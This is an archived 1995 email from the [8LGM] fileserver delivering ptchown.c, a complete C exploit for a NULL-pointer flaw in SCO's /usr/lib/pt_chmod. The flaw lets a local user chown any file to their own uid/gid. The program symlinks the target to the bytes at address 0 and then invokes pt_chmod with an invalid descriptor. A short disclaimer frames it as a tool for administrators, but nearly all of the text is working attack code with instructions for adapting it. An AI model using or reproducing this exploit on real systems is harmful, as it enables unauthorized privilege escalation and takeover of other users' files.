From fileserv@bagpuss.demon.co.uk Fri Dec 1 16:23:24 1995 Return-Path: fileserv@bagpuss.demon.co.uk Received: from mail.netcom.com (root@mail.netcom.com [192.100.81.99]) by onyx.infonexus.com (8.6.12/8.6.9) with ESMTP id QAA25812 for ; Fri, 1 Dec 1995 16:23:21 -0800 Received: from relay-1.mail.demon.net by mail.netcom.com (8.6.12/Netcom) id QAA22397; Fri, 1 Dec 1995 16:19:52 -0800 Received: from bagpuss.demon.co.uk by relay-1.mail.demon.net id sg.aa26481; 2 Dec 95 0:20 GMT Received: (root@localhost) by bagpuss.demon.co.uk (3.1/3.1) id XAA02216; Fri, 1 Dec 1995 23:37:17 GMT Date: Fri, 1 Dec 1995 23:37:17 GMT From: "[8LGM] Fileserver" Message-Id: <199512012337.XAA02216@bagpuss.demon.co.uk> To: Route Reply-To: 8lgm-fileserver@bagpuss.demon.co.uk Subject: ptchown.c X-SMTP-Posting-Host: bagpuss.demon.co.uk [Sat, 2 Dec 95 0:20:53 GMT] Status: RO ============================================================================= Virtual Domain Hosting Services provided by The FOURnet Information Network mail webserv@FOUR.net or see http://www.four.net ============================================================================= WE RESERVE THE RIGHT TO PUBLISH NAMES OF PEOPLE REQUESTING INFORMATION FROM OUR SERVER. IF YOU DO NOT AGREE TO THIS, PLEASE DO NOT REQUEST INFORMATION. This document is Copyright(C) 1994, 1995 by [8LGM] and your usage of the information contained within this document constitutes your agreement to render [8LGM] and all associated parties free from any direct or consequential liabililities or damages which may be incurred as the result of such usage. [8LGM] makes this information available in good faith, to make it possible for System Administrators to have the necessary tools to be able to fix their own systems. However [8LGM] does not endorse the usage of this information for any purposes. Permission is hereby granted for usage only in accordance with the conditions of usage as set forth herein. ptchown.c: /* * ptchown.c * Usage: ptchown file * Copyright [8lgm] 1994, all rights reserved. * * Utilises flaw in /usr/lib/pt_chmod to chown 'file' to your uid/gid. * If invoked with a fd that isnt a valid master pty, ptsname() will * return NULL, which goes unchecked. pt_chmod will thus execute: * * chown(NULL, getuid(), getgid()); * * If your OS maps page 0, such that NULL is a valid address, the chown(2) * will succeed. This program works by symlinking 'file' to NULL, and then * executing pt_chmod with an 'invalid' fd. * * The values given in null_file[] work on our SCO 3.2v4 system. On some * systems the values may change from process to process. To find out the * correct values for your system, run /usr/lib/pt_chmod under your favourite * debugger, and print the first few words from address 0 onwards, until * you hit a null byte. */ #include #include int null_file[3] = {0x8014c, 0x2ba4fde9, 0x0}; int main(argc, argv) int argc; char *argv[]; { if (argc != 2) { fprintf(stderr, "usage: %s file\n", argv[0]); exit(1); } if (symlink(argv[1], null_file)) { perror(argv[1]); exit(1); } close(0); open("/dev/null", O_RDONLY); system("/usr/lib/pt_chmod"); unlink((char*)null_file); exit(0); }